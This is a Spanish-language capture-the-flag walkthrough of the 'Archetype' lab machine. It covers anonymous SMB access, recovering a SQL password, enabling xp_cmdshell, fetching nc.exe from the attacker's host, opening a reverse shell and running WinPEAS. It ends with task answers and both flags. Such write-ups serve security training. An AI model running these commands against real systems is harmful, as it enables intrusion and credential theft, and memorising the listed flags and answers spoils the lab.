# Archetype ### 1. 📝 **Introducción** * **Nivel de Dificultad**: Muy fácil. * **Tags:** * **Protocols**: Conjunto de reglas que permiten la comunicación entre sistemas. * **MSSQL**: Sistema de gestión de bases de datos de Microsoft. * **SMB**: Protocolo para compartir archivos e impresoras en redes locales. * **Powershell**: Shell de comandos y lenguaje de scripting para administración en Windows. * **Reconnaissance**: Fase de recopilación de información en evaluaciones de seguridad. * **Remote Code Execution**: Ejecución de código en un sistema remoto sin autorización. * **Clear Text Credentials**: Credenciales transmitidas sin cifrado, en texto plano. * **Information Disclosure**: Exposición no intencionada de información sensible. * **Anonymous/Guest Access**: Acceso a recursos sin necesidad de autenticación. ### 2. 🛠️ **Entorno** Nos descargamos nuestra VPN y nos conectamos. ``` sudo openvpn nombre_del_archivo.vpn ``` Iniciamos la máquina y verificamos la conexión. ```bash ping -c 1 10.129.187.129 ```

Observamos que tenemos conexión y que es una máquina **Windows** ya que su **ttl=127**. ### 3. 🔍 **Reconocimiento** A continuación, se realiza el comando: ```bash nmap -p- --min-rate 5000 -sV 10.129.187.129 ``` para realizar un escaneo de puertos y servicios detallado en la dirección IP.

### 4. 🚪 **Acceso Inicial** Como se puede observar durante el escaneo, los **puertos 135** (msrpc), **139** (netbios-ssn) y **445** (microsoft-ds) están abiertos, indicando que hay servicios de Microsoft Windows RPC y NetBIOS en ejecución. Además, el **puerto 1433** (ms-sql-s) muestra que Microsoft SQL Server 2017 está activo. Los **puertos 5985** y **47001** están ejecutando Microsoft HTTPAPI httpd 2.0, utilizado para SSDP/UPnP. Los **puertos 49664 a 49669** también están abiertos, todos asociados a Microsoft Windows RPC. A continuación, se realizará un análisis más detallado de estos servicios. ```bash nmap -sV -sC -p135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669 10.129.187.129 ```

En el **puerto 139**, se está ejecutando el servicio de sesión **NetBIOS**. Este servicio facilita la autenticación en un grupo de trabajo o dominio de **Windows** y proporciona acceso a recursos, como archivos e impresoras. El **puerto 445** está destinado al protocolo Server Message Block (**SMB**), el estándar de Internet que utiliza Windows para compartir archivos, impresoras, puertos serie, entre otros. El **puerto 1433** está asociado a **SQL Server**, lo que indica que hay una base de datos en funcionamiento en el servidor. Dado que el protocolo **SMB** se utiliza para compartir archivos, podemos intentar conectarnos de forma anónima en busca de archivos interesantes. ```bash smbmap -H 10.129.187.129 -u " " -p " " ```

Tenemos acceso de lectura en: * **backups**: Es el único recurso compartido no predeterminado y no tiene un comentario, lo que podría indicar que contiene datos interesantes. * **IPC$**: Este recurso compartido oculto es utilizado para la comunicación entre procesos. Permite la interacción con procesos que se ejecutan en el sistema remoto. Al investigar SMB utilizando `smbclient`, conseguimos conectarnos al recurso compartido **backups** sin necesidad de autenticación. ```bash smbclient //10.129.187.129/backups ```

> Los archivos con extensión `.dtsConfig` son archivos de configuración en sintaxis XML que se utilizan para aplicar valores de propiedades a los paquetes de SQL Server Integration Services (SSIS).

Parece ser que nos dan unas credenciales de SQL por lo que nos intentamos conectar. ```bash python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py -windows-auth ARCHETYPE/sql_svc:M3g4c0rp123@10.129.187.129 ```

¡Ahora que tenemos conexión al servidor, podemos utilizar la función `IS_SRVROLEMEMBER` para verificar si el usuario actual de SQL tiene privilegios de `sysadmin` (el nivel más alto) en el servidor SQL. La sintaxis de la función es: ``` IS_SRVROLEMEMBER ( 'role' [ , 'login' ] ) ``` Donde tenemos dos argumentos: * **role**: Indica el rol, que puede ser uno de los siguientes: * sysadmin * serveradmin * dbcreator * setupadmin * bulkadmin * securityadmin * diskadmin * public * processadmin * **login**: Nombre del servidor SQL. En nuestra sesión de SQL Server, usaremos el siguiente comando: ``` SELECT IS_SRVROLEMEMBER('sysadmin') ``` Si la consulta es verdadera, no se obtiene ningún resultado; si es falsa, el resultado será “NULL”. Como tenemos permisos de administrador, podemos utilizar algunas herramientas de configuración de SQL Server para habilitar una conexión remota. Empezaremos utilizando `sp_configure` para modificar algunas configuraciones globales del servidor. La sintaxis es la siguiente: ``` sp_configure [ @configname = ] 'option_name', [ @configvalue = ] { 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 } ``` Donde los argumentos son: * **\[ @configname = ] 'option\_name'**: Es el nombre de la opción de configuración. `option_name` es de tipo `varchar(35)`, con un valor predeterminado de `NULL`. * **\[ @configvalue = ] 'value'**: Es el nuevo valor de configuración. `value` es de tipo `int`, con un valor predeterminado de `NULL`. Una vez que se hayan realizado los cambios en la configuración, es necesario ejecutar `RECONFIGURE` para aplicar las modificaciones. ```bash EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; xp_cmdshell "whoami" ``` Podemos ver que el usuario `archetype\sql_svc` se muestra nuevamente, lo que indica que SQL Server se está ejecutando con ese usuario en Windows. El valor `NULL` aparece, lo que significa que no tiene permisos de administrador. Nuestra shell está funcionando, pero no vamos a ejecutar nuestros comandos de esta manera nuevamente, así que vamos a obtener una shell más estable. Ahora vamos a buscar y encontrar algo. Después de algunas búsquedas, encontramos un artículo: Seguiremos el último método: xp\_cmdshell con `nc`. 1. **Descargar `nc.exe` en tu sistema local**: Puedes descargar `nc.exe` desde el siguiente enlace: 2. **Configurar un servidor Python en tu máquina local**: Inicia un servidor HTTP en la carpeta donde se encuentra `nc.exe` con el siguiente comando: ```bash python3 -m http.server ``` 3. **Transferir el archivo al sistema objetivo**: Usaremos el siguiente comando en el sistema objetivo para descargar `nc.exe`: ```sql xp_cmdshell "powershell.exe wget http://10.10.16.97:8000/nc.exe -OutFile c:\\Users\\Public\\nc.exe" ``` 4. **Verificar la transferencia del archivo**: Si el archivo se transfiere correctamente, deberías ver algo como esto en tu instancia de servidor: ```bash Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.129.187.129 - - [02/Sep/2024 19:42:04] "GET /nc.exe HTTP/1.1" 200 - ``` 5. **Configurar el listener de Netcat en tu máquina local**: Inicia un listener en Netcat con el siguiente comando: ```bash nc -lvnp 4444 ``` 6. **Ejecutar el archivo `nc.exe` en el sistema objetivo**: Ejecuta el siguiente comando en el sistema objetivo para establecer la conexión inversa: ```sql xp_cmdshell "c:\\Users\\Public\\nc.exe -e cmd.exe 10.10.16.97 4444" ```

### 5. 🔑 **Captura de la Flag** Una vez dentro investigamos distintos directorios para ver donde se encuentra la flag. La flag se encuentra en el directorio `/Users/sql_svc/Desktop.`

Esa es la user flag ahora falta la de root.

**WinPEAS** es una herramienta muy útil para enumerar el sistema y encontrar debilidades. A continuación, se detalla cómo transferir y ejecutar **WinPEAS** en el sistema objetivo: 1. **Descargar WinPEAS** Descarga el archivo WinPEAS desde el siguiente enlace:\ [WinPEASx64.exe](https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe) 2. **Configurar el Servidor Python** Inicia un servidor HTTP en tu máquina local para transferir el archivo. Utiliza el siguiente comando en tu terminal: ```bash python3 -m http.server ``` Asegúrate de ejecutar este comando en el directorio donde se encuentra el archivo `winPEASx64.exe`. 3. **Transferir el Archivo al Sistema Objetivo** Cambia a PowerShell en el sistema objetivo, ya que `cmd.exe` no dispone del comando `wget`. Ejecuta el siguiente comando para descargar el archivo: ```powershell wget http://[Tu_IP_Tun0]:8000/winPEASx64.exe -outfile winPEASx64.exe ``` Reemplaza `[Tu_IP_Tun0]` con la dirección IP de tu máquina local. 4. **Confirmar la Transferencia** Verifica que el archivo `winPEASx64.exe` se haya transferido correctamente al sistema objetivo, tal como hiciste anteriormente con `nc.exe`. 5. **Ejecutar WinPEAS** Una vez transferido, ejecuta WinPEAS en el sistema objetivo con el siguiente comando: ```powershell powershell ./winPEASx64.exe ``` Observa el archivo llamado `ConsoleHost_history.txt`. A continuación, se detallan los pasos para navegar hasta este archivo y visualizar su contenido: 1. **Navegar al Directorio** Cambia al directorio donde se encuentra el archivo ejecutando los siguientes comandos en la terminal: ```powershell cd \ cd Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline ``` 2. **Mostrar el Contenido del Archivo** Utiliza el siguiente comando para mostrar el contenido del archivo `ConsoleHost_history.txt`: ```powershell type ConsoleHost_history.txt ```

### 6. ❓Preguntas #### Tarea 1: ¿Qué puerto TCP está alojando un servidor de base de datos? **1433** *Es el puerto por defecto en el que Microsoft SQL Server escucha las conexiones entrantes, permitiendo la interacción con la base de datos.* #### Tarea 2: ¿Cuál es el nombre del recurso compartido no administrativo disponible a través de SMB? **backups** *Este recurso compartido no es uno de los predeterminados y puede contener información interesante que no está incluida en las configuraciones estándar.* #### Tarea 3: ¿Cuál es la contraseña identificada en el archivo en el recurso compartido SMB? **M3g4c0rp123** *La contraseña "M3g4c0rp123" fue descubierta en uno de los archivos del recurso compartido SMB, y puede ser utilizada para acceder a otras áreas protegidas del sistema.* #### Tarea 4: ¿Qué script de la colección Impacket se puede usar para establecer una conexión autenticada con un Microsoft SQL Server? **mssqlclient.py** *Parte de la colección Impacket, este script permite establecer conexiones autenticadas a Microsoft SQL Server, facilitando la administración remota y la explotación de la base de datos.* #### Tarea 5: ¿Qué procedimiento almacenado extendido de Microsoft SQL Server se puede usar para iniciar una shell de comandos de Windows? **xp\_cmdshell** *Permite ejecutar comandos del sistema operativo desde SQL Server, lo que puede ser utilizado para obtener una shell de comandos en el sistema.* #### Tarea 6: ¿Qué script se puede usar para buscar posibles rutas para escalar privilegios en hosts Windows? **winpeas** *Herramienta de enumeración que busca posibles rutas de escalada de privilegios en sistemas Windows, ayudando a identificar vulnerabilidades y configuraciones inseguras.* #### Tarea 7: ¿Qué archivo contiene la contraseña del administrador? **ConsoleHost\_history.txt** *Contiene el historial de comandos de PowerShell, en el que se puede encontrar la contraseña del administrador, proporcionando acceso adicional al sistema.* #### Tarea 8: Enviar la bandera de usuario 3e7b102e78218e935bf3f4951fec21a3 #### Tarea 9: **Enviar la bandera de root** b91ccec3305e98240082d4474b848528